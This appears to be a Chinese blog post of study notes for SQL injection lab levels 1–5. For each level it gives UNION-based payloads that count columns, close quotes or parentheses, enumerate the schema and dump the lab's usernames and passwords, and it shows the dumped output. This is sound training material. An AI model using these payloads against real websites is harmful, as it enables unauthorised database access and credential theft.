SQL注入1-5题

ELECT VERSION() -- mysql版本
SELECT USER() -- mysql数据库的用户名
SELECT DATABASE() -- 当前数据库SELECT *,schema_name FROM schemata -- 当前用户拥有的所有的数据库的名字,schema_name
SELECT * FROM TABLES -- 当前用户拥有的所有数据库及其库下面的表的名字,table_schema,tablename
SELECT * FROM COLUMNS -- 当前用户拥有的所有数据库及其库下面的表的名字,及表下面的字段的名字

(1).获取所有账号密码 有引号

  1. 获取访问数据源列数
?id=1 order by 3 --+    //看是否访问出值,存在表示列数存在
sele user,pass from table where id='1' order by 3 --+ imint 0.1   //--+  将后面的imint进行一个注释
  1. 获取账号和密码所在列
?id=' union select 1,2,3  --+     // '  强行闭合放空
  1. 获取所在的库库名(爆库)
?id=' union select 1,database(),3 --+   //获取到库名security
  1. 获取所在的库下的表名,并试着寻找最有可能的表(爆表)
?id=' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+//Your Login name:emails,referers,uagents,users   找出来的表
  1. 获取表下面的列,查看是否正确
?id=' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+//Your Login name:id,username,password   拿到想要的结果,确定了表
  1. 获取所有密码和账号
?id=' union select 1,group_concat(username),group_concat(password) from users --+Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4//拿到所需要的账号和密码

(2).获取所有账号密码 无引号

  1. 获取访问数据源列数
?id=1 order by 3 --+    //看是否访问出值,存在表示列数存在
sele user,pass from table where id='1' order by 3 --+ imint 0.1
//--+  将后面的imint进行一个注释    因为id为数字型,没有单引号括着
  1. 获取账号和密码所在列
?id='' union select 1,2,3  --+
//数字型放空直接两个单引号
  1. 获取所在的库库名(爆库)
?id='' union select 1,database(),3 --+   //Your Login name:security 获取到库名security
  1. 获取所在的库下的表名,并试着寻找最有可能的表(爆表)
?id='' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+//Your Login name:emails,referers,uagents,users   找出来的表
  1. 获取表下面的列,查看是否正确
?id='' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+//Your Login name:id,username,password   拿到想要的结果,确定了表
  1. 获取所有密码和账号
?id='' union select 1,group_concat(username),group_concat(password) from users --+Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4//拿到所需要的账号和密码

(3).获取所有账号密码 存在括号和单引号

  1. 获取访问数据源列数
?id=1 order by 3 --+    //看是否访问出值,存在表示列数存在
//--+  将后面的imint进行一个注释    因为id为数字型,所以这里不需要存在闭合
  1. 获取账号和密码所在列
?id=') union select 1,2,3  --+
//数字型放空直接两个单引号
?id='') union select 1,2,3  --+ //可以运行但是无结果,因为括号单引号和外闭合
  1. 获取所在的库库名(爆库)
?id=') union select 1,database(),3 --+   //Your Login name:security 获取到库名security
  1. 获取所在的库下的表名,并试着寻找最有可能的表(爆表)
?id=') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+//Your Login name:emails,referers,uagents,users   找出来的表
  1. 获取表下面的列,查看是否正确
?id=') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+//Your Login name:id,username,password   拿到想要的结果,确定了表
  1. 获取所有密码和账号
?id=') union select 1,group_concat(username),group_concat(password) from users --+Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4//拿到所需要的账号和密码

(4)获取所有账号密码 双引号与括号

  1. 获取访问数据源列数
?id=1") order by 3 --+    //看是否访问出值,存在表示列数存在
//--+  将后面的imint进行一个注释    因为存在双引号和括号,需要对应才可以得到内容
  1. 获取账号和密码所在列
?id=") union select 1,2,3  --+
//数字型放空直接两个单引号
  1. 获取所在的库库名(爆库)
?id=") union select 1,database(),3 --+   //Your Login name:security 获取到库名security
  1. 获取所在的库下的表名,并试着寻找最有可能的表(爆表)
?id=") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+//Your Login name:emails,referers,uagents,users   找出来的表
  1. 获取表下面的列,查看是否正确
?id=") union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+//Your Login name:id,username,password   拿到想要的结果,确定了表
  1. 获取所有密码和账号
?id=") union select 1,group_concat(username),group_concat(password) from users --+Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4//拿到所需要的账号和密码

(5)获取所有账号密码

  1. 获取访问数据源列数
?id=1") order by 3 --+    //看是否访问出值,存在表示列数存在
//--+  将后面的imint进行一个注释    因为存在双引号和括号,需要对应才可以得到内容
  1. 获取账号和密码所在列
?id=") union select 1,2,3  --+
//数字型放空直接两个单引号
  1. 获取所在的库库名(爆库)
?id=") union select 1,database(),3 --+   //Your Login name:security 获取到库名security
  1. 获取所在的库下的表名,并试着寻找最有可能的表(爆表)
?id=") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+//Your Login name:emails,referers,uagents,users   找出来的表
  1. 获取表下面的列,查看是否正确
?id=") union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+//Your Login name:id,username,password   拿到想要的结果,确定了表
  1. 获取所有密码和账号
?id=") union select 1,group_concat(username),group_concat(password) from users --+Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4//拿到所需要的账号和密码

2020.12.17 SQL注入相关推荐

  1. 2020.12.17

    2020.12.17 1.无重复字符的最长子串(leetcode3) 思路:使用滑动窗口机制 设置右指针移动,其实就是一个队列,比如例题中的 abcabcbb,进入这个队列(窗口)为 abc 满足题目 ...

  2. B站小迪安全笔记第12天-SQL注入之简要注入

    前言: 在本系列课程学习中,SQL注入漏洞将是重点部分,其中 SQL注入又非常复杂,区分各种数据库类型,提交方法,数据类型等注入,我们需 要按部就班的学习,才能学会相关 SQL注入的核心.同样此类漏洞 ...

  3. 2020/12/17 ubuntu16.04 NTP时间同步配置

    ntp时间同步,大体步骤是将服务器端和客户端配置好,然后设定同步的频率,记得重新运行ntp服务,重启即可. 步骤总结如下: 一 服务器端(server) 1. 安装ntp与ntpdate $ sudo ...

  4. 2020.12.17 ps临摹

    欢迎观看阿贝贝啊的今日成果 今天上课临摹了两张图 感谢观看阿贝贝啊的今日划水 日常

  5. web安全入门(第四章-1)SQL注入的原理分析

    1.SQL注入本质 注入攻击的本质,是把用户输入的数据当作代码执行这有两个条件: 第一个是用户能够控制输入 第二个是原本程序要执行的代码,拼接里用户输入的数据然后执行sql注入就是针对sql语句的注入 ...

  6. sql注入的攻击与利用

    前言 本文叙述了在Mysql.MSsql.Oracle.PostgreSQL平台下的sql注入探测方式与利用,作为个人笔记,没有框架以及中间件的参与. 文章的内容并不全面,日后有接触新的方法会有补充. ...

  7. 【BP靶场portswigger-服务端1】SQL注入-17个实验(全)

    前言: 介绍: 博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章). 殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edus ...

  8. MySQL 之Navicat Premium 12安装使用、pymysql模块使用、sql注入问题的产生与解决

    阅读目录 一.Navicat Premium 12简介与使用: 二.pymysql模块的使用: 查: 增删改 三.sql注入问题产生与解决方法: 本文内容提要: Navicat Premium 12 ...

  9. metinfo mysql_Metinfo 5.3.17 前台SQL注入漏洞

    Metinfo 8月1日升级了版本,修复了一个影响小于等于5.3.17版本(几乎可以追溯到所有5.x版本)的SQL注入漏洞.这个SQL注入漏洞不受软WAF影响,可以直接获取数据,影响较广. ### 0 ...

最新文章

  1. html字体整体偏移,html/css:在悬停鼠标时增加字体大小的链接时的位置偏移
  2. python 教程 第十五章、 结构布局
  3. n2n内网穿透打洞部署全过程 + nginx公网端口映射
  4. (WWWWWWWWWW)codevs 3305 水果姐逛水果街Ⅱ
  5. SNMP简单网络管理协议
  6. 欣赏下国外人css3打造的载入动画
  7. UWP 流畅设计中的光照效果(容易的 RevealBorderBrush 和不那么容易的 RevealBackgroundBrush)...
  8. 攻防世界 MISC 新手练习区 答题(1-12题解)
  9. 《高性能Linux服务器构建实战》——2.2节开始安装Varnish
  10. 播放m3u8视频,用小米浏览器播放m3u8视频
  11. PowerBI数据分析之Power BI Desktop数据整理
  12. 常用jquery方法 总结
  13. Apple App store的应用购买限制 - 年龄
  14. 微信小程序之一本地图片处理--按屏幕尺寸插入图片
  15. Word文档中怎么删除空白页?删除空白页的五种方法
  16. JAVA 酒店预订系统
  17. python scapy模块安装_Python scapy网络包嗅探模块(转载)
  18. Shell -----grep
  19. 学习的本质,不在于记住多少知识,而是它触发了你哪些思考
  20. 基于WebRTC实现1v1音视频聊天室

热门文章

  1. linux远程打印,OpenSUSE 远程打印教程
  2. 电磁流量计安装须留意什么
  3. mysql查询供应3号的顾客_现有一个商店的数据库,记录顾客及其购物情况,根据要求解答问题...
  4. 思科华为交换设备安全配置命令对比
  5. 节点电压用直角坐标表示时的牛顿拉夫逊法潮流计算(电力系统分析华中科技大学出版社)...
  6. pytorch中model.eval的作用
  7. React-beautiful-dnd 拖曳组件
  8. 应用未安装 该文件包与具有同一名称的现有文件包存在冲突
  9. 里程碑!Apache Pulsar 全球 GitHub 贡献者数量超越 520——点进来定位你的名字!...
  10. python中struct time_python工具模块介绍-time 时间访问和转换!